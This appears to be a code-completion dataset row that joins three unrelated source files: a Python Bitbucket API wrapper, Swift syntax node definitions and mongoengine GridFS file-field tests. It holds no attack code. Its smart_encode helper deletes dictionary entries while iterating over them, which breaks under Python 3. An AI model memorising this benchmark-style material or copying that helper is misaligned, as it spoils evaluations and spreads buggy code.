gt
stringclasses
1 value
context
stringlengths
2.49k
119k
#!/usr/bin/env python # -*- coding: utf-8 -*- """Bitbucket API wrapper. Written to be somewhat like py-github: https://github.com/dustin/py-github """ try: from urllib.request import Request, urlopen except ImportError: from urllib2 import Request, urlopen try: from urllib.parse import urlencode except ImportError: from urllib import urlencode from functools import wraps import datetime import time import base64 try: import json except ImportError: import simplejson as json __all__ = ['AuthenticationRequired', 'to_datetime', 'BitBucket'] api_toplevel = 'https://api.bitbucket.org/' api_base = '%s1.0/' % api_toplevel class AuthenticationRequired(Exception): pass def requires_authentication(method): @wraps(method) def wrapper(self, *args, **kwargs): username = self.bb.username if hasattr(self, 'bb') else self.username password = self.bb.password if hasattr(self, 'bb') else self.password if not all((username, password)): raise AuthenticationRequired("%s requires authentication" % method.__name__) return method(self, *args, **kwargs) return wrapper def smart_encode(**kwargs): """Urlencode's provided keyword arguments. If any kwargs are None, it does not include those.""" args = dict(kwargs) for k, v in args.items(): if v is None: del args[k] if not args: return '' return urlencode(args) def to_datetime(timestring): """Convert one of the bitbucket API's timestamps to a datetime object.""" format = '%Y-%m-%d %H:%M:%S' timestring = timestring.split('+')[0].strip() return datetime.datetime(*time.strptime(timestring, format)[:7]) class BitBucket(object): """Main bitbucket class. 
Use an instantiated version of this class to make calls against the REST API.""" def __init__(self, username='', password='', verbose=False): self.username = username self.password = password self.verbose = verbose def build_request(self, url, method="GET", data=None): if not all((self.username, self.password)): return Request(url) auth = '%s:%s' % (self.username, self.password) auth = {'Authorization': 'Basic %s' % (base64.b64encode(auth.encode("utf_8")).decode("utf_8").strip())} request = Request(url, data, auth) request.get_method = lambda: method return request def load_url(self, url, method="GET", data=None): if self.verbose: print("Sending request to: [{}]".format(url)) request = self.build_request(url, method=method, data=data) result = urlopen(request).read().decode("utf_8") if self.verbose: print(u"Response data: [{}]".format(result)) return result def user(self, username): return User(self, username) def repository(self, username, slug): return Repository(self, username, slug) @requires_authentication def emails(self): """Returns a list of configured email addresses for the authenticated user.""" url = api_base + 'emails/' return json.loads(self.load_url(url)) @requires_authentication def create_repo(self, repo_data): url = api_base + 'repositories/' return json.loads(self.load_url(url, method="POST", data=urlencode(repo_data))) def __repr__(self): extra = '' if all((self.username, self.password)): extra = ' (auth: %s)' % self.username return '<BitBucket API%s>' % extra class User(object): """API encapsulation for user related bitbucket queries.""" def __init__(self, bb, username): self.bb = bb self.username = username def repository(self, slug): return Repository(self.bb, self.username, slug) def repositories(self): user_data = self.get() return user_data['repositories'] def events(self, start=None, limit=None): query = smart_encode(start=start, limit=limit) url = api_base + 'users/%s/events/' % self.username if query: url += '?%s' % query return 
json.loads(self.bb.load_url(url)) def get(self): url = api_base + 'users/%s/' % self.username return json.loads(self.bb.load_url(url)) def __repr__(self): return '<User: %s>' % self.username class Repository(object): def __init__(self, bb, username, slug): self.bb = bb self.username = username self.slug = slug self.base_url = api_base + 'repositories/%s/%s/' % (self.username, self.slug) def get(self): return json.loads(self.bb.load_url(self.base_url)) def changeset(self, revision): """Get one changeset from a repos.""" url = self.base_url + 'changesets/%s/' % (revision) return json.loads(self.bb.load_url(url)) def changesets(self, limit=None): """Get information about changesets on a repository.""" url = self.base_url + 'changesets/' query = smart_encode(limit=limit) if query: url += '?%s' % query return json.loads(self.bb.load_url(url)) def tags(self): """Get a list of tags for a repository.""" url = self.base_url + 'tags/' return json.loads(self.bb.load_url(url)) def branches(self): """Get a list of branches for a repository.""" url = self.base_url + 'branches/' return json.loads(self.bb.load_url(url)) def issue(self, number): return Issue(self.bb, self.username, self.slug, number) def issues(self, start=None, limit=None): url = self.base_url + 'issues/' query = smart_encode(start=start, limit=limit) if query: url += '?%s' % query return json.loads(self.bb.load_url(url)) def events(self): url = self.base_url + 'events/' return json.loads(self.bb.load_url(url)) def followers(self): url = self.base_url + 'followers/' return json.loads(self.bb.load_url(url)) @requires_authentication def save(self, repo_data): url = self.base_url return json.loads(self.bb.load_url(url, method="PUT", data=urlencode(repo_data))) def __repr__(self): return '<Repository: %s\'s %s>' % (self.username, self.slug) class Issue(object): def __init__(self, bb, username, slug, number): self.bb = bb self.username = username self.slug = slug self.number = number self.base_url = api_base + 
'repositories/%s/%s/issues/%s/' % (username, slug, number) def get(self): return json.loads(self.bb.load_url(self.base_url)) def followers(self): url = self.base_url + 'followers/' return json.loads(self.bb.load_url(url)) def __repr__(self): return '<Issue #%s on %s\'s %s>' % (self.number, self.username, self.slug)
# flake8: noqa I201 from Child import Child from Node import Node DECL_NODES = [ # type-assignment -> '=' type Node('TypeInitializerClause', kind='Syntax', children=[ Child('Equal', kind='EqualToken'), Child('Value', kind='Type'), ]), # typealias-declaration -> attributes? access-level-modifier? 'typealias' # typealias-name generic-parameter-clause? # type-assignment # typealias-name -> identifier Node('TypealiasDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('TypealiasKeyword', kind='TypealiasToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Initializer', kind='TypeInitializerClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), ]), # associatedtype-declaration -> attributes? access-level-modifier? # 'associatedtype' associatedtype-name # inheritance-clause? type-assignment? # generic-where-clause? 
# associatedtype-name -> identifier Node('AssociatedtypeDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('AssociatedtypeKeyword', kind='AssociatedtypeToken'), Child('Identifier', kind='IdentifierToken'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('Initializer', kind='TypeInitializerClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), ]), Node('FunctionParameterList', kind='SyntaxCollection', element='FunctionParameter'), Node('ParameterClause', kind='Syntax', traits=['Parenthesized'], children=[ Child('LeftParen', kind='LeftParenToken'), Child('ParameterList', kind='FunctionParameterList'), Child('RightParen', kind='RightParenToken'), ]), # -> Type Node('ReturnClause', kind='Syntax', children=[ Child('Arrow', kind='ArrowToken'), Child('ReturnType', kind='Type'), ]), # function-signature -> # '(' parameter-list? ')' (throws | rethrows)? '->'? type? Node('FunctionSignature', kind='Syntax', children=[ Child('Input', kind='ParameterClause'), Child('ThrowsOrRethrowsKeyword', kind='Token', is_optional=True, token_choices=[ 'ThrowsToken', 'RethrowsToken', ]), Child('Output', kind='ReturnClause', is_optional=True), ]), # if-config-clause -> # ('#if' | '#elseif' | '#else') expr? 
(stmt-list | switch-case-list) Node('IfConfigClause', kind='Syntax', children=[ Child('PoundKeyword', kind='Token', classification='BuildConfigId', token_choices=[ 'PoundIfToken', 'PoundElseifToken', 'PoundElseToken', ]), Child('Condition', kind='Expr', classification='BuildConfigId', is_optional=True), Child('Elements', kind='Syntax', node_choices=[ Child('Statements', kind='CodeBlockItemList'), Child('SwitchCases', kind='SwitchCaseList'), Child('Decls', kind='MemberDeclList'), ]), ]), Node('IfConfigClauseList', kind='SyntaxCollection', element='IfConfigClause'), # if-config-decl -> '#if' expr stmt-list else-if-directive-clause-list # else-clause? '#endif' Node('IfConfigDecl', kind='Decl', children=[ Child('Clauses', kind='IfConfigClauseList'), Child('PoundEndif', kind='PoundEndifToken', classification='BuildConfigId'), ]), Node('PoundErrorDecl', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundError', kind='PoundErrorToken'), Child('LeftParen', kind='LeftParenToken'), Child('Message', kind='StringLiteralExpr'), Child('RightParen', kind='RightParenToken') ]), Node('PoundWarningDecl', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundWarning', kind='PoundWarningToken'), Child('LeftParen', kind='LeftParenToken'), Child('Message', kind='StringLiteralExpr'), Child('RightParen', kind='RightParenToken') ]), Node('PoundSourceLocation', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundSourceLocation', kind='PoundSourceLocationToken'), Child('LeftParen', kind='LeftParenToken'), Child('Args', kind='PoundSourceLocationArgs', is_optional=True), Child('RightParen', kind='RightParenToken') ]), Node('PoundSourceLocationArgs', kind='Syntax', children=[ Child('FileArgLabel', kind='IdentifierToken', text_choices=['file']), Child('FileArgColon', kind='ColonToken'), Child('FileName', kind='StringLiteralToken'), Child('Comma', kind='CommaToken'), Child('LineArgLabel', kind='IdentifierToken', text_choices=['line']), Child('LineArgColon', 
kind='ColonToken'), Child('LineNumber', kind='IntegerLiteralToken'), ]), Node('DeclModifier', kind='Syntax', children=[ Child('Name', kind='Token', classification='Attribute', text_choices=[ 'class', 'convenience', 'dynamic', 'final', 'infix', 'lazy', 'optional', 'override', 'postfix', 'prefix', 'required', 'static', 'unowned', 'weak', 'private', 'fileprivate', 'internal', 'public', 'open', 'mutating', 'nonmutating', 'indirect', '__consuming' ]), Child('DetailLeftParen', kind='LeftParenToken', is_optional=True), Child('Detail', kind='IdentifierToken', is_optional=True), Child('DetailRightParen', kind='RightParenToken', is_optional=True), ]), Node('InheritedType', kind='Syntax', traits=['WithTrailingComma'], children=[ Child('TypeName', kind='Type'), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), Node('InheritedTypeList', kind='SyntaxCollection', element='InheritedType'), # type-inheritance-clause -> ':' type Node('TypeInheritanceClause', kind='Syntax', children=[ Child('Colon', kind='ColonToken'), Child('InheritedTypeCollection', kind='InheritedTypeList'), ]), # class-declaration -> attributes? access-level-modifier? # 'class' class-name # generic-parameter-clause? # type-inheritance-clause? # generic-where-clause? # '{' class-members '}' # class-name -> identifier Node('ClassDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ClassKeyword', kind='ClassToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), # struct-declaration -> attributes? access-level-modifier? # 'struct' struct-name # generic-parameter-clause? 
# type-inheritance-clause? # generic-where-clause? # '{' struct-members '}' # struct-name -> identifier Node('StructDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('StructKeyword', kind='StructToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), Node('ProtocolDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ProtocolKeyword', kind='ProtocolToken'), Child('Identifier', kind='IdentifierToken'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), # extension-declaration -> attributes? access-level-modifier? # 'extension' extended-type # type-inheritance-clause? # generic-where-clause? 
# '{' extension-members '}' # extension-name -> identifier Node('ExtensionDecl', kind='Decl', traits=['DeclGroup'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ExtensionKeyword', kind='ExtensionToken'), Child('ExtendedType', kind='Type'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), Node('MemberDeclBlock', kind='Syntax', traits=['Braced'], children=[ Child('LeftBrace', kind='LeftBraceToken'), Child('Members', kind='MemberDeclList'), Child('RightBrace', kind='RightBraceToken'), ]), # member-decl-list = member-decl member-decl-list? Node('MemberDeclList', kind='SyntaxCollection', element='MemberDeclListItem'), # member-decl = decl ';'? Node('MemberDeclListItem', kind='Syntax', description=''' A member declaration of a type consisting of a declaration and an \ optional semicolon; ''', children=[ Child('Decl', kind='Decl', description='The declaration of the type member.'), Child('Semicolon', kind='SemicolonToken', is_optional=True, description='An optional trailing semicolon.'), ]), # source-file = code-block-item-list eof Node('SourceFile', kind='Syntax', traits=['WithStatements'], children=[ Child('Statements', kind='CodeBlockItemList'), Child('EOFToken', kind='EOFToken') ]), # initializer -> '=' expr Node('InitializerClause', kind='Syntax', children=[ Child('Equal', kind='EqualToken'), Child('Value', kind='Expr'), ]), # parameter -> # external-parameter-name? local-parameter-name ':' # type '...'? '='? expression? ','? 
Node('FunctionParameter', kind='Syntax', traits=['WithTrailingComma'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('FirstName', kind='Token', token_choices=[ 'IdentifierToken', 'WildcardToken', ], is_optional=True), # One of these two names needs be optional, we choose the second # name to avoid backtracking. Child('SecondName', kind='Token', token_choices=[ 'IdentifierToken', 'WildcardToken', ], is_optional=True), Child('Colon', kind='ColonToken', is_optional=True), Child('Type', kind='Type', is_optional=True), Child('Ellipsis', kind='Token', is_optional=True), Child('DefaultArgument', kind='InitializerClause', is_optional=True), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), # declaration-modifier -> access-level-modifier # | mutation-modifier # | 'class' # | 'convenience' # | 'dynamic' # | 'final' # | 'infix' # | 'lazy' # | 'optional' # | 'override' # | 'postfix' # | 'prefix' # | 'required' # | 'static' # | 'unowned' # | 'unowned(safe)' # | 'unowned(unsafe)' # | 'weak' # mutation-modifier -> 'mutating' | 'nonmutating' Node('ModifierList', kind='SyntaxCollection', element='DeclModifier', element_name='Modifier'), Node('FunctionDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('FuncKeyword', kind='FuncToken'), Child('Identifier', kind='Token', token_choices=[ 'IdentifierToken', 'UnspacedBinaryOperatorToken', 'SpacedBinaryOperatorToken', 'PrefixOperatorToken', 'PostfixOperatorToken', ]), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Signature', kind='FunctionSignature'), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Body', kind='CodeBlock', is_optional=True), ]), Node('InitializerDecl', kind='Decl', children=[ Child('Attributes', 
kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('InitKeyword', kind='InitToken'), Child('OptionalMark', kind='Token', token_choices=[ 'PostfixQuestionMarkToken', 'InfixQuestionMarkToken', 'ExclamationMarkToken', ], is_optional=True), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Parameters', kind='ParameterClause'), Child('ThrowsOrRethrowsKeyword', kind='Token', is_optional=True, token_choices=[ 'ThrowsToken', 'RethrowsToken', ]), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Body', kind='CodeBlock', is_optional=True), ]), Node('DeinitializerDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('DeinitKeyword', kind='DeinitToken'), Child('Body', kind='CodeBlock'), ]), Node('SubscriptDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('SubscriptKeyword', kind='SubscriptToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Indices', kind='ParameterClause'), Child('Result', kind='ReturnClause'), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Accessor', kind='Syntax', is_optional=True, node_choices=[ Child('Accessors', kind='AccessorBlock'), Child('Getter', kind='CodeBlock')]), ]), # access-level-modifier -> 'private' | 'private' '(' 'set' ')' # | 'fileprivate' | 'fileprivate' '(' 'set' ')' # | 'internal' | 'internal' '(' 'set' ')' # | 'public' | 'public' '(' 'set' ')' # | 'open' | 'open' '(' 'set' ')' Node('AccessLevelModifier', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('LeftParen', kind='LeftParenToken', 
is_optional=True), Child('Modifier', kind='IdentifierToken', is_optional=True), Child('RightParen', kind='RightParenToken', is_optional=True), ]), Node('AccessPathComponent', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('TrailingDot', kind='PeriodToken', is_optional=True), ]), Node('AccessPath', kind='SyntaxCollection', element='AccessPathComponent'), Node('ImportDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ImportTok', kind='ImportToken'), Child('ImportKind', kind='Token', is_optional=True, token_choices=[ 'TypealiasToken', 'StructToken', 'ClassToken', 'EnumToken', 'ProtocolToken', 'VarToken', 'LetToken', 'FuncToken', ]), Child('Path', kind='AccessPath'), ]), # (value) Node('AccessorParameter', kind='Syntax', traits=['Parenthesized'], children=[ Child('LeftParen', kind='LeftParenToken'), Child('Name', kind='IdentifierToken'), Child('RightParen', kind='RightParenToken'), ]), Node('AccessorDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifier', kind='DeclModifier', is_optional=True), Child('AccessorKind', kind='Token', text_choices=[ 'get', 'set', 'didSet', 'willSet', 'unsafeAddress', 'addressWithOwner', 'addressWithNativeOwner', 'unsafeMutableAddress', 'mutableAddressWithOwner', 'mutableAddressWithNativeOwner', '_read', '_modify' ]), Child('Parameter', kind='AccessorParameter', is_optional=True), Child('Body', kind='CodeBlock', is_optional=True), ]), Node('AccessorList', kind="SyntaxCollection", element='AccessorDecl'), Node('AccessorBlock', kind="Syntax", traits=['Braced'], children=[ Child('LeftBrace', kind='LeftBraceToken'), Child('Accessors', kind='AccessorList'), Child('RightBrace', kind='RightBraceToken'), ]), # Pattern: Type = Value { get {} }, Node('PatternBinding', kind="Syntax", traits=['WithTrailingComma'], children=[ Child('Pattern', kind='Pattern'), 
Child('TypeAnnotation', kind='TypeAnnotation', is_optional=True), Child('Initializer', kind='InitializerClause', is_optional=True), Child('Accessor', kind='Syntax', is_optional=True, node_choices=[ Child('Accessors', kind='AccessorBlock'), Child('Getter', kind='CodeBlock')]), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), Node('PatternBindingList', kind="SyntaxCollection", element='PatternBinding'), Node('VariableDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('LetOrVarKeyword', kind='Token', token_choices=[ 'LetToken', 'VarToken', ]), Child('Bindings', kind='PatternBindingList'), ]), Node('EnumCaseElement', kind='Syntax', description=''' An element of an enum case, containing the name of the case and, \ optionally, either associated values or an assignment to a raw value. ''', traits=['WithTrailingComma'], children=[ Child('Identifier', kind='IdentifierToken', description='The name of this case.'), Child('AssociatedValue', kind='ParameterClause', is_optional=True, description='The set of associated values of the case.'), Child('RawValue', kind='InitializerClause', is_optional=True, description=''' The raw value of this enum element, if present. '''), Child('TrailingComma', kind='CommaToken', is_optional=True, description=''' The trailing comma of this element, if the case has \ multiple elements. '''), ]), Node('EnumCaseElementList', kind='SyntaxCollection', description='A collection of 0 or more `EnumCaseElement`s.', element='EnumCaseElement'), Node('EnumCaseDecl', kind='Decl', description=''' A `case` declaration of a Swift `enum`. It can have 1 or more \ `EnumCaseElement`s inside, each declaring a different case of the enum. ''', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the case declaration. 
'''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the case declaration. '''), Child('CaseKeyword', kind='CaseToken', description='The `case` keyword for this case.'), Child('Elements', kind='EnumCaseElementList', description='The elements this case declares.') ]), Node('EnumDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `enum` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the enum declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the enum declaration. '''), Child('EnumKeyword', kind='EnumToken', description=''' The `enum` keyword for this declaration. '''), Child('Identifier', kind='IdentifierToken', description=''' The name of this enum. '''), Child('GenericParameters', kind='GenericParameterClause', is_optional=True, description=''' The generic parameters, if any, for this enum. '''), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True, description=''' The inheritance clause describing conformances or raw \ values for this enum. '''), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True, description=''' The `where` clause that applies to the generic parameters of \ this enum. '''), Child('Members', kind='MemberDeclBlock', description=''' The cases and other members of this enum. ''') ]), # operator-decl -> attribute? modifiers? 'operator' operator Node('OperatorDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `operator` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the 'operator' declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, classification='Attribute', description=''' The declaration modifiers applied to the 'operator' declaration. 
'''), Child('OperatorKeyword', kind='OperatorToken'), Child('Identifier', kind='Token', token_choices=[ 'UnspacedBinaryOperatorToken', 'SpacedBinaryOperatorToken', 'PrefixOperatorToken', 'PostfixOperatorToken', ]), Child('InfixOperatorGroup', kind='InfixOperatorGroup', description=''' Optionally specify a precedence group ''', is_optional=True), ]), # infix-operator-group -> ':' identifier Node('InfixOperatorGroup', kind='Syntax', description=''' A clause to specify precedence group in infix operator declaration. ''', children=[ Child('Colon', kind='ColonToken'), Child('PrecedenceGroupName', kind='IdentifierToken', description=''' The name of the precedence group for the operator '''), ]), # precedence-group-decl -> attributes? modifiers? 'precedencegroup' # identifier '{' precedence-group-attribute-list # '}' Node('PrecedenceGroupDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `precedencegroup` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the 'precedencegroup' declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the 'precedencegroup' declaration. '''), Child('PrecedencegroupKeyword', kind='PrecedencegroupToken'), Child('Identifier', kind='IdentifierToken', description=''' The name of this precedence group. '''), Child('LeftBrace', kind='LeftBraceToken'), Child('GroupAttributes', kind='PrecedenceGroupAttributeList', description=''' The characteristics of this precedence group. 
'''), Child('RightBrace', kind='RightBraceToken'), ]), # precedence-group-attribute-list -> # (precedence-group-relation | precedence-group-assignment | # precedence-group-associativity )* Node('PrecedenceGroupAttributeList', kind='SyntaxCollection', element='Syntax', element_choices=[ 'PrecedenceGroupRelation', 'PrecedenceGroupAssignment', 'PrecedenceGroupAssociativity' ]), # precedence-group-relation -> # ('higherThan' | 'lowerThan') ':' precedence-group-name-list Node('PrecedenceGroupRelation', kind='Syntax', description=''' Specify the new precedence group's relation to existing precedence groups. ''', children=[ Child('HigherThanOrLowerThan', kind='IdentifierToken', classification='Keyword', text_choices=[ 'higherThan', 'lowerThan', ], description=''' The relation to specified other precedence groups. '''), Child('Colon', kind='ColonToken'), Child('OtherNames', kind='PrecedenceGroupNameList', description=''' The name of other precedence group to which this precedence group relates. '''), ]), # precedence-group-name-list -> # identifier (',' identifier)* Node('PrecedenceGroupNameList', kind='SyntaxCollection', element='PrecedenceGroupNameElement'), Node('PrecedenceGroupNameElement', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), # precedence-group-assignment -> # 'assignment' ':' ('true' | 'false') Node('PrecedenceGroupAssignment', kind='Syntax', description=''' Specifies the precedence of an operator when used in an operation that includes optional chaining. ''', children=[ Child('AssignmentKeyword', kind='IdentifierToken', text_choices=['assignment']), Child('Colon', kind='ColonToken'), Child('Flag', kind='Token', token_choices=[ 'TrueToken', 'FalseToken', ], description=''' When true, an operator in the corresponding precedence group uses the same grouping rules during optional chaining as the assignment operators from the standard library. 
Otherwise, operators in the precedence group follows the same optional chaining rules as operators that don't perform assignment. '''), ]), # precedence-group-associativity -> # 'associativity' ':' ('left' | 'right' | 'none') Node('PrecedenceGroupAssociativity', kind='Syntax', description=''' Specifies how a sequence of operators with the same precedence level are grouped together in the absence of grouping parentheses. ''', children=[ Child('AssociativityKeyword', kind='IdentifierToken', classification='Keyword', text_choices=['associativity']), Child('Colon', kind='ColonToken'), Child('Value', kind='IdentifierToken', text_choices=['left', 'right', 'none'], description=''' Operators that are `left`-associative group left-to-right. Operators that are `right`-associative group right-to-left. Operators that are specified with an associativity of `none` don't associate at all '''), ]), ]
# -*- coding: utf-8 -*- import copy import os import unittest import tempfile import gridfs import six from nose.plugins.skip import SkipTest from mongoengine import * from mongoengine.connection import get_db from mongoengine.python_support import StringIO try: from PIL import Image HAS_PIL = True except ImportError: HAS_PIL = False TEST_IMAGE_PATH = os.path.join(os.path.dirname(__file__), 'mongoengine.png') TEST_IMAGE2_PATH = os.path.join(os.path.dirname(__file__), 'mongodb_leaf.png') class FileTest(unittest.TestCase): def setUp(self): connect(db='mongoenginetest') self.db = get_db() def tearDown(self): self.db.drop_collection('fs.files') self.db.drop_collection('fs.chunks') def test_file_field_optional(self): # Make sure FileField is optional and not required class DemoFile(Document): the_file = FileField() DemoFile.objects.create() def test_file_fields(self): """Ensure that file fields can be written to and their data retrieved """ class PutFile(Document): the_file = FileField() PutFile.drop_collection() text = six.b('Hello, World!') content_type = 'text/plain' putfile = PutFile() putfile.the_file.put(text, content_type=content_type, filename="hello") putfile.save() result = PutFile.objects.first() self.assertTrue(putfile == result) self.assertEqual("%s" % result.the_file, "<GridFSProxy: hello>") self.assertEqual(result.the_file.read(), text) self.assertEqual(result.the_file.content_type, content_type) result.the_file.delete() # Remove file from GridFS PutFile.objects.delete() # Ensure file-like objects are stored PutFile.drop_collection() putfile = PutFile() putstring = StringIO() putstring.write(text) putstring.seek(0) putfile.the_file.put(putstring, content_type=content_type) putfile.save() result = PutFile.objects.first() self.assertTrue(putfile == result) self.assertEqual(result.the_file.read(), text) self.assertEqual(result.the_file.content_type, content_type) result.the_file.delete() def test_file_fields_stream(self): """Ensure that file fields can be 
        written to and their data retrieved """
        class StreamFile(Document):
            the_file = FileField()

        StreamFile.drop_collection()

        text = six.b('Hello, World!')
        more_text = six.b('Foo Bar')
        content_type = 'text/plain'

        # Stream two chunks through the GridFS proxy, then persist.
        streamfile = StreamFile()
        streamfile.the_file.new_file(content_type=content_type)
        streamfile.the_file.write(text)
        streamfile.the_file.write(more_text)
        streamfile.the_file.close()
        streamfile.save()

        result = StreamFile.objects.first()
        self.assertTrue(streamfile == result)
        self.assertEqual(result.the_file.read(), text + more_text)
        self.assertEqual(result.the_file.content_type, content_type)

        # seek/tell/read must behave like a regular file object.
        result.the_file.seek(0)
        self.assertEqual(result.the_file.tell(), 0)
        self.assertEqual(result.the_file.read(len(text)), text)
        self.assertEqual(result.the_file.tell(), len(text))
        self.assertEqual(result.the_file.read(len(more_text)), more_text)
        self.assertEqual(result.the_file.tell(), len(text + more_text))

        result.the_file.delete()

        # Ensure deleted file returns None
        self.assertTrue(result.the_file.read() is None)

    def test_file_fields_stream_after_none(self):
        """Ensure that a file field can be written to after it has been
        saved as None.
        """
        class StreamFile(Document):
            the_file = FileField()

        StreamFile.drop_collection()

        text = six.b('Hello, World!')
        more_text = six.b('Foo Bar')
        # NOTE(review): content_type is only referenced by the commented-out
        # assertion below; new_file() is called without it.
        content_type = 'text/plain'

        # Save first with no file content, then stream data in afterwards.
        streamfile = StreamFile()
        streamfile.save()
        streamfile.the_file.new_file()
        streamfile.the_file.write(text)
        streamfile.the_file.write(more_text)
        streamfile.the_file.close()
        streamfile.save()

        result = StreamFile.objects.first()
        self.assertTrue(streamfile == result)
        self.assertEqual(result.the_file.read(), text + more_text)
        # self.assertEqual(result.the_file.content_type, content_type)

        result.the_file.seek(0)
        self.assertEqual(result.the_file.tell(), 0)
        self.assertEqual(result.the_file.read(len(text)), text)
        self.assertEqual(result.the_file.tell(), len(text))
        self.assertEqual(result.the_file.read(len(more_text)), more_text)
        self.assertEqual(result.the_file.tell(), len(text + more_text))

        result.the_file.delete()

        # Ensure deleted file returns None
        self.assertTrue(result.the_file.read() is None)

    def test_file_fields_set(self):
        """Ensure a FileField accepts direct assignment of raw bytes and
        that the stored file can later be replaced."""
        class SetFile(Document):
            the_file = FileField()

        text = six.b('Hello, World!')
        more_text = six.b('Foo Bar')

        SetFile.drop_collection()

        setfile = SetFile()
        setfile.the_file = text
        setfile.save()

        result = SetFile.objects.first()
        self.assertTrue(setfile == result)
        self.assertEqual(result.the_file.read(), text)

        # Try replacing file with new one
        result.the_file.replace(more_text)
        result.save()

        result = SetFile.objects.first()
        self.assertTrue(setfile == result)
        self.assertEqual(result.the_file.read(), more_text)
        result.the_file.delete()

    def test_file_field_no_default(self):
        """Ensure grid_id stays stable across saves, both when the document
        starts with no file and when it starts with a (empty) default."""
        class GridDocument(Document):
            the_file = FileField()

        GridDocument.drop_collection()

        with tempfile.TemporaryFile() as f:
            f.write(six.b("Hello World!"))
            f.flush()

            # Test without default
            doc_a = GridDocument()
            doc_a.save()

            doc_b = GridDocument.objects.with_id(doc_a.id)
            doc_b.the_file.replace(f, filename='doc_b')
            doc_b.save()
            self.assertNotEqual(doc_b.the_file.grid_id, None)

            # Test it matches
            doc_c = GridDocument.objects.with_id(doc_b.id)
            self.assertEqual(doc_b.the_file.grid_id, doc_c.the_file.grid_id)

            # Test with default
            doc_d = GridDocument(the_file=six.b(''))
            doc_d.save()

            doc_e = GridDocument.objects.with_id(doc_d.id)
            self.assertEqual(doc_d.the_file.grid_id, doc_e.the_file.grid_id)

